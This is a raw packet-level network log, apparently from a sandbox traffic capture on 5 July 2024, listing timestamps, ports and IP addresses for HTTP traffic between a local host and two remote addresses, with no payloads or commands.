Jul 5, 2024 07:16:47.491202116 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.491208076 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.491214037 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.491226912 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.491234064 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.491245031 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.494926929 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.494947910 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.494975090 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.581204891 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581229925 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581243038 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581269026 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.581326008 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.581337929 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581351042 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581387997 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.581557989 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581729889 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581768990 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581774950 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.581780910 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581793070 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581814051 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.581935883 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.581986904 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.582613945 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.582669020 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.582680941 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.582716942 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.582778931 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.582791090 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.582825899 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.586199999 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.586262941 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.586280107 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.586323023 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.586441994 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.586453915 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.586499929 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.621135950 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.621402979 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.621459007 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.671324968 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671361923 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671374083 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671519041 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671529055 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.671533108 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671546936 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671565056 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671588898 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.671669960 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671685934 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671817064 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.671830893 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671844959 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671863079 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671875000 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671886921 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671895981 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.671900988 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671914101 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.671921015 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.671968937 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.672223091 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672240973 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672259092 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672430038 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.672593117 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672605038 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672616005 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672629118 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672749043 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672763109 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672779083 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.672781944 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672796011 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672807932 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672821045 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.672827005 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.672910929 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.673446894 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.673515081 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.673527002 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.673649073 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.723504066 CEST	80	49174	91.92.254.14	192.168.2.22
Jul 5, 2024 07:16:47.725020885 CEST	49174	80	192.168.2.22	91.92.254.14
Jul 5, 2024 07:16:47.728910923 CEST	49174	80	192.168.2.22	91.92.254.14
Jul 5, 2024 07:16:47.733918905 CEST	80	49174	91.92.254.14	192.168.2.22
Jul 5, 2024 07:16:47.739089966 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739171028 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739181042 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739221096 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739244938 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.739289999 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739382029 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739392042 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739402056 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739516973 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739526987 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739537001 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.739537001 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739689112 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739701986 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.739706039 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.739778042 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.761276960 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761321068 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761398077 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761425972 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.761462927 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761475086 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761555910 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761567116 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761580944 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.761634111 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761673927 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761693954 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.761718988 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761823893 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761836052 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761847019 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.761944056 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.761955023 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762114048 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.762134075 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762173891 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762182951 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762300014 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762384892 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762393951 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.762402058 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762501955 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762512922 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762516975 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.762563944 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.762649059 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762737989 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762752056 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762856960 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.762893915 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762904882 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762916088 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.762928009 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.763032913 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.763048887 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.763139963 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.828934908 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.828999043 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829009056 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829127073 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829139948 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829154015 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.829206944 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829221010 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829329967 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.829361916 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829372883 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829386950 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829397917 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829407930 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829431057 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.829555988 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.829587936 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829641104 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829651117 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829761982 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.829853058 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829941034 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.829953909 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830032110 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.830066919 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830076933 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830085993 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830097914 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830132961 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.830132961 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.830260992 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830271006 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830408096 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.830549955 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830560923 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830569983 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830714941 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830725908 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830734968 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830737114 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.830748081 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830758095 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.830837965 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.830905914 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830923080 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830934048 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.830945015 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.831338882 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.831366062 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.831418991 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.831429958 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.831505060 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.831532001 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.831542969 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.831615925 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.851517916 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.851583958 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.851593971 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.851695061 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.851707935 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.851799965 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.851809978 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.851819992 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.851819038 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.851927042 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.851944923 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.852026939 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852036953 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852128983 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852147102 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.852185011 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852279902 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852289915 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852397919 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852408886 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852418900 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.852545977 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852629900 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852639914 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852649927 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.852756023 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852766991 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852777004 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852787971 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.852796078 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.852905035 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.853049040 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853060007 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853070021 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853081942 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853102922 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.853276968 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853298903 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853311062 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853322983 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853432894 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853442907 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853451967 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.853455067 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853529930 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853540897 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853549004 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.853552103 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853564978 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853575945 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853588104 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.853595972 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.854212999 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854238033 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.854275942 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854286909 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854434013 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854444981 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854454994 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854455948 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.854465008 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854507923 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.854686975 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854696989 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854707956 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854717970 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854728937 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854734898 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.854741096 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.854743958 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.860903978 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.868907928 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.918806076 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.918864012 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.918879986 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.918931961 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.918958902 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919008970 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919111013 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919122934 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919131994 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.919137001 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919171095 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.919254065 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919301033 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919364929 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919375896 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919387102 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919504881 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919524908 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.919526100 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919605017 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919616938 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919626951 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919738054 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919758081 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.919802904 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919900894 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919914007 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919919014 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.919925928 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.919991970 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.920156002 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920166969 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920176983 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920187950 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920197964 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920208931 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920217037 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.920221090 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920241117 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.920397997 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.920490980 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920500994 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920634985 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920651913 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920663118 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920672894 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920681000 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.920686007 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920701981 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920705080 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.920713902 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920723915 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920732021 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.920737982 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920751095 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.920756102 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.920838118 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.920882940 CEST	49176	80	192.168.2.22	172.232.56.138
